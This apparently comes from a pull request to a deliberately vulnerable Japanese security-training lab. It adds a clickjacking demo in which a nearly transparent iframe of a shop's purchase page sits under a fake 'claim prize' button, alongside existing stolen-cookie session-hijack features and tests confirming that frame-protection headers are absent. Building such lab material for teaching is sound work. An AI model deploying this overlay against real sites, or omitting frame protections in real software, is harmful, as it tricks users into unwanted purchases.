+        });
       }
     </script>
   </body>

--- a/apps/attacker/public/clickjacking.html
+++ b/apps/attacker/public/clickjacking.html
@@ -1,0 +1,178 @@
+<!doctype html>
+<html lang="ja">
+  <head>
+    <meta charset="utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+    <title>Attacker Site (Clickjacking Demo)</title>
+    <style>
+      :root { color-scheme: dark; }
+      body {
+        margin: 0;
+        min-height: 100vh;
+        font-family: Georgia, "Times New Roman", serif;
+        background:
+          radial-gradient(circle at top, rgba(255, 214, 10, 0.25), transparent 40%),
+          linear-gradient(180deg, #2d1208 0%, #140b07 50%, #070707 100%);
+        color: #fff9e6;
+      }
+      .shell {
+        max-width: 980px;
+        margin: 0 auto;
+        padding: 48px 20px 72px;
+      }
+      .hero {
+        position: relative;
+        overflow: hidden;
+        border-radius: 24px;
+        border: 1px solid rgba(255, 220, 120, 0.25);
+        background: linear-gradient(135deg, rgba(255, 244, 202, 0.12), rgba(255, 177, 66, 0.06));
+        box-shadow: 0 24px 80px rgba(0, 0, 0, 0.45);
+        padding: 36px;
+      }
+      .eyebrow {
+        display: inline-block;
+        padding: 6px 12px;
+        border-radius: 999px;
+        background: rgba(255, 208, 76, 0.18);
+        color: #ffd977;
+        letter-spacing: 0.1em;
+        font-size: 12px;
+      }
+      h1 {
+        margin: 16px 0 12px;
+        font-size: clamp(36px, 7vw, 64px);
+        line-height: 0.95;
+      }
+      .lead {
+        max-width: 560px;
+        margin: 0;
+        color: #f2dfc5;
+        font-size: 18px;
+        line-height: 1.6;
+      }
+      .stage {
+        position: relative;
+        margin-top: 32px;
+        width: min(100%, 580px);
+        height: 220px;
+      }
+      .bait {
+        position: absolute;
+        inset: 0;
+        display: flex;
+        align-items: center;
+        justify-content: center;
+        border-radius: 24px;
+        background:
+          linear-gradient(160deg, rgba(255, 255, 255, 0.18), rgba(255, 255, 255, 0.02)),
+          linear-gradient(135deg, #ff8e2b, #ff3f34);
+        color: #fffef6;
+        font-size: 34px;
+        font-weight: 700;
+        letter-spacing: 0.06em;
+        box-shadow: 0 18px 50px rgba(255, 80, 45, 0.35);
+        text-shadow: 0 2px 14px rgba(0, 0, 0, 0.25);
+      }
+      .hint {
+        position: absolute;
+        left: 24px;
+        right: 24px;
+        bottom: 18px;
+        color: rgba(255, 245, 214, 0.92);
+        font-size: 14px;
+      }
+      .trap-frame {
+        position: absolute;
+        top: -202px;
+        left: -1px;
+        width: 640px;
+        height: 560px;
+        border: 0;
+        opacity: 0.02;
+      }
+      .debug {
+        margin-top: 28px;
+        border-top: 1px solid rgba(255, 223, 145, 0.18);
+        padding-top: 20px;
+        color: #dcccb0;
+        font-size: 14px;
+      }
+      code {
+        background: rgba(255, 255, 255, 0.08);
+        padding: 2px 6px;
+        border-radius: 6px;
+      }
+      .steps {
+        margin-top: 10px;
+        padding-left: 18px;
+      }
+      .steps li {
+        margin-bottom: 6px;
+      }
+      @media (max-width: 720px) {
+        .hero {
+          padding: 24px;
+        }
+        .stage {
+          height: 180px;
+        }
+        .bait {
+          font-size: 26px;
+          text-align: center;
+          padding: 0 24px;
+        }
+        .trap-frame {
+          top: -218px;
+          left: -54px;
+          transform: scale(0.92);
+          transform-origin: top left;
+        }
+      }
+    </style>
+  </head>
+  <body>
+    <main class="shell">
+      <section class="hero">
+        <span class="eyebrow">Clickjacking Demo</span>
+        <h1>限定特典を受け取る</h1>
+        <p class="lead">
+          派手なボタンに見せかけつつ、背後では別サイトの購入ボタンを押させるデモです。被害者には正規の購入画面がほぼ見えません。
+        </p>
+
+        <div class="stage">
+          <div class="bait" aria-hidden="true">景品を受け取る</div>
+          <div class="hint">1回クリックすると、見えない iframe 上の購入ボタンが押されます。</div>
+          <iframe
+            class="trap-frame"
+            id="trapFrame"
+            title="hidden purchase frame"
+            loading="eager"
+          ></iframe>
+        </div>
+
+        <div class="debug">
+          <p style="margin-top: 0;"><strong>【学習用デバッグ表示】</strong></p>
+          <p>埋め込み先: <code id="targetPath"></code></p>
+          <ol class="steps">
+            <li>被害者として Shop にログインしておく</li>
+            <li>このページで「景品を受け取る」位置をクリックする</li>
+            <li>Shop の <code>/orders</code> を開いて注文追加を確認する</li>
+          </ol>
+        </div>
+      </section>
+    </main>
+
+    <script>
+      const clickjackingTarget =
+        window.__CLICKJACKING_TARGET__ || new URL("/purchase/1", window.__TARGET_BASE__).toString();
+      const frame = document.getElementById("trapFrame");
+      const targetPath = document.getElementById("targetPath");
+      if (frame) {
+        frame.src = clickjackingTarget;
+      }
+      if (targetPath) {
+        targetPath.textContent = clickjackingTarget;
+      }
+    </script>
+  </body>
+</html>

--- a/apps/attacker/public/index.html
+++ b/apps/attacker/public/index.html
@@ -81,6 +81,11 @@
           <a class="btn" href="/auto-purchase">自動購入を開く</a>
         </div>
         <div class="card">
+          <h3>クリックジャッキング</h3>
+          <p>透明 iframe で購入画面を重ね、被害者に正規UIを押させるデモです。</p>
+          <a class="btn" href="/clickjacking">Clickjacking を開く</a>
+        </div>
+        <div class="card">
           <h3>セッションハイジャック</h3>
           <p>XSS で盗まれた Cookie を確認し、被害者セッションの再利用へ進みます。</p>
           <a class="btn" href="/session-hijack">Session Hijack を開く</a>

--- a/apps/attacker/server.js
+++ b/apps/attacker/server.js
@@ -21,6 +21,7 @@ function renderPage(filename, pageData) {
     <script>
       window.__TARGET_BASE__ = ${JSON.stringify(pageData.targetBase)};
       window.__LAST_STOLEN_COOKIE__ = ${JSON.stringify(pageData.lastStolenCookie)};
+      window.__CLICKJACKING_TARGET__ = ${JSON.stringify(pageData.clickjackingTarget)};
     </script>
     ${body}
   </body>
@@ -45,7 +46,8 @@ function createApp(options) {
   function render(filename) {
     return renderPage(filename, {
       targetBase: config.targetBase,
-      lastStolenCookie: config.state.lastStolenCookie || ""
+      lastStolenCookie: config.state.lastStolenCookie || "",
+      clickjackingTarget: new URL("/purchase/1", config.targetBase).toString()
     });
   }
 
@@ -89,6 +91,11 @@ function createApp(options) {
   app.get("/auto-purchase", (req, res) => {
     res.setHeader("content-type", "text/html; charset=utf-8");
     res.send(render("auto_purchase.html"));
+  });
+
+  app.get("/clickjacking", (req, res) => {
+    res.setHeader("content-type", "text/html; charset=utf-8");
+    res.send(render("clickjacking.html"));
   });
 
   app.get("/collect", (req, res) => {

--- a/apps/attacker/server.js
+++ b/apps/attacker/server.js
@@ -6,7 +6,9 @@ const express = require("express");
 const morgan = require("morgan");
 
 const DEFAULT_PORT = Number(process.env.PORT || 5000);
-const DEFAULT_TARGET_BASE = process.env.TARGET_BASE || "http://localhost:4000";
+const DEFAULT_TARGET_BASE_PUBLIC = process.env.TARGET_BASE || "http://localhost:8000";
+const DEFAULT_TARGET_BASE_INTERNAL =
+  process.env.TARGET_INTERNAL_BASE || DEFAULT_TARGET_BASE_PUBLIC;
 
 function renderPage(filename, pageData) {
   const body = fs.readFileSync(path.join(__dirname, "public", filename), "utf8");
@@ -31,12 +33,15 @@ function renderPage(filename, pageData) {
 function createApp(options) {
   const config = Object.assign(
     {
-      targetBase: DEFAULT_TARGET_BASE,
       logger: morgan("dev"),
       state: { lastStolenCookie: "" }
     },
     options || {}
   );
+  config.targetBasePublic =
+    config.targetBasePublic || config.targetBase || DEFAULT_TARGET_BASE_PUBLIC;
+  config.targetBaseInternal =
+    config.targetBaseInternal || config.targetBase || DEFAULT_TARGET_BASE_INTERNAL;
 
   const app = express();
   if (config.logger) {
@@ -45,9 +50,9 @@ function createApp(options) {
 
   function render(filename) {
     return renderPage(filename, {
-      targetBase: config.targetBase,
+      targetBase: config.targetBasePublic,
       lastStolenCookie: config.state.lastStolenCookie || "",
-      clickjackingTarget: new URL("/purchase/1", config.targetBase).toString()
+      clickjackingTarget: new URL("/purchase/1", config.targetBasePublic).toString()
     });
   }
 
@@ -60,7 +65,7 @@ function createApp(options) {
   }
 
   function proxyWithStolenCookie(replayPath, callback) {
-    const targetUrl = new URL(config.targetBase);
+    const targetUrl = new URL(config.targetBaseInternal);
     const transport = targetUrl.protocol === "https:" ? https : http;
     const requestOptions = {
       protocol: targetUrl.protocol,
@@ -144,7 +149,13 @@ function startServer(options) {
     // eslint-disable-next-line no-console
     console.log(`[attacker] listening on http://localhost:${server.address().port}`);
     // eslint-disable-next-line no-console
-    console.log(`[attacker] TARGET_BASE=${config.targetBase || DEFAULT_TARGET_BASE}`);
+    console.log(
+      `[attacker] TARGET_BASE=${config.targetBasePublic || DEFAULT_TARGET_BASE_PUBLIC}`
+    );
+    // eslint-disable-next-line no-console
+    console.log(
+      `[attacker] TARGET_INTERNAL_BASE=${config.targetBaseInternal || DEFAULT_TARGET_BASE_INTERNAL}`
+    );
   });
   return { app: app, server: server };
 }

--- a/apps/attacker/test/server.test.js
+++ b/apps/attacker/test/server.test.js
@@ -97,7 +97,9 @@ async function testClickjackingPageShowsEmbeddedPurchaseTarget() {
     const response = await makeRequest(port, "/clickjacking");
     assert.strictEqual(response.statusCode, 200);
     assert(response.body.includes("Clickjacking Demo"));
-    assert(response.body.includes("景品を受け取る"));
+    assert(response.body.includes("本物の Shop 画面を表示する"));
+    assert(response.body.includes("このページ自身は"));
+    assert(response.body.includes("本物の UI"));
     assert(
       response.body.includes("http://localhost:4000/purchase/1") ||
         response.body.includes("http:\\/\\/localhost:4000\\/purchase\\/1")

--- a/apps/attacker/test/server.test.js
+++ b/apps/attacker/test/server.test.js
@@ -97,9 +97,9 @@ async function testClickjackingPageShowsEmbeddedPurchaseTarget() {
     const response = await makeRequest(port, "/clickjacking");
     assert.strictEqual(response.statusCode, 200);
     assert(response.body.includes("Clickjacking Demo"));
-    assert(response.body.includes("本物の Shop 画面を表示する"));
-    assert(response.body.includes("このページ自身は"));
-    assert(response.body.includes("本物の UI"));
+    assert(response.body.includes("本物の Shop を見せたまま"));
+    assert(response.body.includes("偽UIレイヤー"));
+    assert(response.body.includes("本物の Shop 画面"));
     assert(
       response.body.includes("http://localhost:8000/purchase/1") ||
         response.body.includes("http:\\/\\/localhost:8000\\/purchase\\/1")

--- a/apps/attacker/test/server.test.js
+++ b/apps/attacker/test/server.test.js
@@ -101,8 +101,8 @@ async function testClickjackingPageShowsEmbeddedPurchaseTarget() {
     assert(response.body.includes("このページ自身は"));
     assert(response.body.includes("本物の UI"));
     assert(
-      response.body.includes("http://localhost:4000/purchase/1") ||
-        response.body.includes("http:\\/\\/localhost:4000\\/purchase\\/1")
+      response.body.includes("http://localhost:8000/purchase/1") ||
+        response.body.includes("http:\\/\\/localhost:8000\\/purchase\\/1")
     );
   });
 }

--- a/apps/attacker/test/server.test.js
+++ b/apps/attacker/test/server.test.js
@@ -87,6 +87,21 @@ async function testTopPageShowsSessionHijackEntry() {
     assert.strictEqual(response.statusCode, 200);
     assert(response.body.includes("セッションハイジャック"));
     assert(response.body.includes("/session-hijack"));
+    assert(response.body.includes("クリックジャッキング"));
+    assert(response.body.includes("/clickjacking"));
+  });
+}
+
+async function testClickjackingPageShowsEmbeddedPurchaseTarget() {
+  await withServer(async (port) => {
+    const response = await makeRequest(port, "/clickjacking");
+    assert.strictEqual(response.statusCode, 200);
+    assert(response.body.includes("Clickjacking Demo"));
+    assert(response.body.includes("景品を受け取る"));
+    assert(
+      response.body.includes("http://localhost:4000/purchase/1") ||
+        response.body.includes("http:\\/\\/localhost:4000\\/purchase\\/1")
+    );
   });
 }
 
@@ -159,6 +174,7 @@ async function testReplayFlow() {
 
 async function run() {
   await testTopPageShowsSessionHijackEntry();
+  await testClickjackingPageShowsEmbeddedPurchaseTarget();
   await testCollectAndSessionHijackPageShowStolenCookie();
   await testReplayFlow();
 }

--- a/apps/shop/src/server.js
+++ b/apps/shop/src/server.js
@@ -103,19 +103,6 @@ function ensureDir(dirPath) {
     fs.mkdirSync(dirPath, { recursive: true });
   }
 }
-
-app.get("/", (req, res) => {
-  res.render("home", { currentUser: res.locals.currentUser });
-});
-
-app.get("/hands-on", (req, res) => {
-  res.render("hands_on", {
-    currentUser: res.locals.currentUser,
-    attackerUrl: ATTACKER_URL + "/csrf",
-    attackerCollectorUrl: ATTACKER_URL + "/collect",
-    attackerSessionHijackUrl: ATTACKER_URL + "/session-hijack"
-  });
-});
 function createApp(options) {
   const config = Object.assign(
     {
@@ -181,7 +168,10 @@ function createApp(options) {
   app.get("/hands-on", (req, res) => {
     res.render("hands_on", {
       currentUser: res.locals.currentUser,
-      attackerUrl: config.attackerUrl + "/csrf"
+      attackerUrl: config.attackerUrl + "/csrf",
+      attackerCollectorUrl: config.attackerUrl + "/collect",
+      attackerSessionHijackUrl: config.attackerUrl + "/session-hijack",
+      attackerClickjackingUrl: config.attackerUrl + "/clickjacking"
     });
   });
 

--- a/apps/shop/test/server.test.js
+++ b/apps/shop/test/server.test.js
@@ -169,6 +169,19 @@ async function run() {
       handsOnResponse.body.indexOf(Buffer.from("体験⑦ ディレクトリ・トラバーサル")),
       -1
     );
+
+    const purchaseResponse = await sendRequest(started.server, {
+      path: "/purchase/1",
+      headers: {
+        cookie: cookie
+      }
+    });
+    assert.strictEqual(purchaseResponse.statusCode, 200);
+    assert.strictEqual(purchaseResponse.headers["x-frame-options"], undefined);
+    assert.strictEqual(
+      purchaseResponse.headers["content-security-policy"],
+      undefined
+    );
   } finally {
     started.server.close();
     started.db.close();

--- a/apps/shop/test/server.test.js
+++ b/apps/shop/test/server.test.js
@@ -158,7 +158,15 @@ async function run() {
     });
     assert.strictEqual(handsOnResponse.statusCode, 200);
     assert.notStrictEqual(
-      handsOnResponse.body.indexOf(Buffer.from("体験⑤ ディレクトリ・トラバーサル")),
+      handsOnResponse.body.indexOf(Buffer.from("体験⑤ クリックジャッキング")),
+      -1
+    );
+    assert.notStrictEqual(
+      handsOnResponse.body.indexOf(Buffer.from("http://localhost:9000/clickjacking")),
+      -1
+    );
+    assert.notStrictEqual(
+      handsOnResponse.body.indexOf(Buffer.from("体験⑦ ディレクトリ・トラバーサル")),
       -1
     );
   } finally {

--- a/apps/shop/views/hands_on.ejs
+++ b/apps/shop/views/hands_on.ejs
@@ -10,7 +10,9 @@
 
 <div class="card hero stack">
   <h3 style="margin: 0;">このアプリについて</h3>
-  <p class="muted" style="margin: 0;">意図的に脆弱な実装を含みます。下記の体験シナリオに沿って挙動を確認してください。</p>
+  <p class="muted" style="margin: 0;">
+    意図的に脆弱な実装を含みます。下記の体験シナリオに沿って挙動を確認してください。
+  </p>
 </div>
 
 <div class="stack">
@@ -78,16 +80,35 @@
     <ol>
       <li>ショップにログインした状態にする</li>
       <li>新しいタブで<a href="<%= attackerUrl %>" target="_blank" rel="noreferrer">攻撃用サイト（景品当選サイト）</a>を開く</li>
-      <li>「🎁 景品を受け取る」をクリック</li>
-      <li>ショップの<a href="/products/1">商品詳細（Coffee Beans）</a>を確認し、勝手にコメントが投稿されていることを確認</li>
+      <li>「景品を受け取る」をクリックする</li>
+      <li>ショップの<a href="/products/1">商品詳細（Coffee Beans）</a>を確認し、勝手にコメントが投稿されていることを確認する</li>
     </ol>
     <p class="muted">原因: リクエストが「正しい画面から送られたか」をサーバーが検証していない</p>
   </div>
 
   <div class="card stack">
     <div class="section-title">
+      <span class="pill">Clickjacking</span>
+      <h3 style="margin: 0;">体験⑤ クリックジャッキング</h3>
+    </div>
+    <ol>
+      <li><a href="/login">ログイン</a>（alice / password123）し、Shop にログイン済み状態にする</li>
+      <li>新しいタブで<a href="<%= attackerClickjackingUrl %>" target="_blank" rel="noreferrer">Clickjacking Demo</a>を開く</li>
+      <li>表示された「景品を受け取る」位置をクリックする</li>
+      <li><a href="/orders">注文履歴</a>を開き、自分では Shop 上で購入していないのに注文が追加されていることを確認する</li>
+    </ol>
+    <p class="muted">
+      原因: フレーム埋め込み防止ヘッダが無いため、攻撃者サイトが正規の購入画面を透明 iframe で重ね、被害者自身にボタンを押させられる
+    </p>
+    <p class="muted" style="margin-top: 0;">
+      CSRF は攻撃者がリクエストを直接送るのに対し、クリックジャッキングは被害者に正規 UI を誤操作させる点が違います。
+    </p>
+  </div>
+
+  <div class="card stack">
+    <div class="section-title">
       <span class="pill">Session</span>
-      <h3 style="margin: 0;">体験⑤ セッションハイジャック</h3>
+      <h3 style="margin: 0;">体験⑥ セッションハイジャック</h3>
     </div>
     <ol>
       <li><a href="/login">ログイン</a>（alice / password123）して<a href="/products/1">商品詳細</a>を開く</li>
@@ -96,9 +117,15 @@
       <li>新しいタブで<a href="<%= attackerSessionHijackUrl %>" target="_blank" rel="noreferrer">Session Hijack ページ</a>を開き、盗まれた <code>connect.sid</code> を確認する</li>
       <li>「盗んだセッションで注文履歴を見る」を押し、被害者として注文履歴へアクセスできることを確認する</li>
     </ol>
-    <p class="muted">原因: XSS と JavaScript から読めるセッションCookieが組み合わさり、攻撃者が被害者のログイン状態を再利用できる</p>
+    <p class="muted">
+      原因: XSS と JavaScript から読めるセッションCookieが組み合わさり、攻撃者が被害者のログイン状態を再利用できる
+    </p>
+  </div>
+
+  <div class="card stack">
+    <div class="section-title">
       <span class="pill">Traversal</span>
-      <h3 style="margin: 0;">体験⑤ ディレクトリ・トラバーサル</h3>
+      <h3 style="margin: 0;">体験⑦ ディレクトリ・トラバーサル</h3>
     </div>
     <ol>
       <li><a href="/login">ログイン</a>（alice / password123）して<a href="/products/1">商品詳細</a>を開く</li>
@@ -107,7 +134,9 @@
       <li>投稿されたコメントの「添付ファイルを開く」をクリックする</li>
       <li>本来画像しか見えないはずの導線で、サーバーソースが読めることを確認する</li>
     </ol>
-    <p class="muted">原因: 添付画像パスをサーバーが信用し、許可ディレクトリ外への移動を防いでいない</p>
+    <p class="muted">
+      原因: 添付画像パスをサーバーが信用し、許可ディレクトリ外への移動を防いでいない
+    </p>
   </div>
 </div>
 

--- a/apps/shop/views/hands_on.ejs
+++ b/apps/shop/views/hands_on.ejs
@@ -94,14 +94,15 @@
     <ol>
       <li><a href="/login">ログイン</a>（alice / password123）し、Shop にログイン済み状態にする</li>
       <li>新しいタブで<a href="<%= attackerClickjackingUrl %>" target="_blank" rel="noreferrer">Clickjacking Demo</a>を開く</li>
-      <li>表示された「景品を受け取る」位置をクリックする</li>
+      <li>まず「本物の Shop 画面を表示する」を押し、背後に埋め込まれている <code>/purchase/1</code> を確認する</li>
+      <li>「隠してもう一度試す」で戻し、表示された「景品を受け取る」位置をクリックする</li>
       <li><a href="/orders">注文履歴</a>を開き、自分では Shop 上で購入していないのに注文が追加されていることを確認する</li>
     </ol>
     <p class="muted">
-      原因: フレーム埋め込み防止ヘッダが無いため、攻撃者サイトが正規の購入画面を透明 iframe で重ね、被害者自身にボタンを押させられる
+      原因: フレーム埋め込み防止ヘッダが無いため、攻撃者サイトが正規の購入画面を iframe で重ね、被害者自身に本物のボタンを押させられる
     </p>
     <p class="muted" style="margin-top: 0;">
-      CSRF は攻撃者がリクエストを直接送るのに対し、クリックジャッキングは被害者に正規 UI を誤操作させる点が違います。
+      CSRF は攻撃者が勝手にリクエストを送るのに対し、クリックジャッキングは被害者に正規 UI を誤操作させる点が違います。
     </p>
   </div>
 

--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -22,7 +22,8 @@ services:
       context: ./apps/attacker
     environment:
       - PORT=9000
-      - TARGET_BASE=http://shop:8000
+      - TARGET_BASE=http://localhost:8000
+      - TARGET_INTERNAL_BASE=http://shop:8000
     ports:
       - "9000:9000"
     volumes:


### PR DESCRIPTION
## Summary
- add an attacker-side clickjacking demo page that overlays the Shop purchase screen in a transparent iframe
- document the clickjacking scenario in the Shop hands-on page and README
- add regression tests for the new attacker route and the Shop framing preconditions

## Testing
- cd apps/attacker && npm test
- cd apps/shop && npm test

## Notes
- GUI browser-based manual verification was not possible in this environment, so the framing preconditions and routes were verified at the HTTP/page-output level instead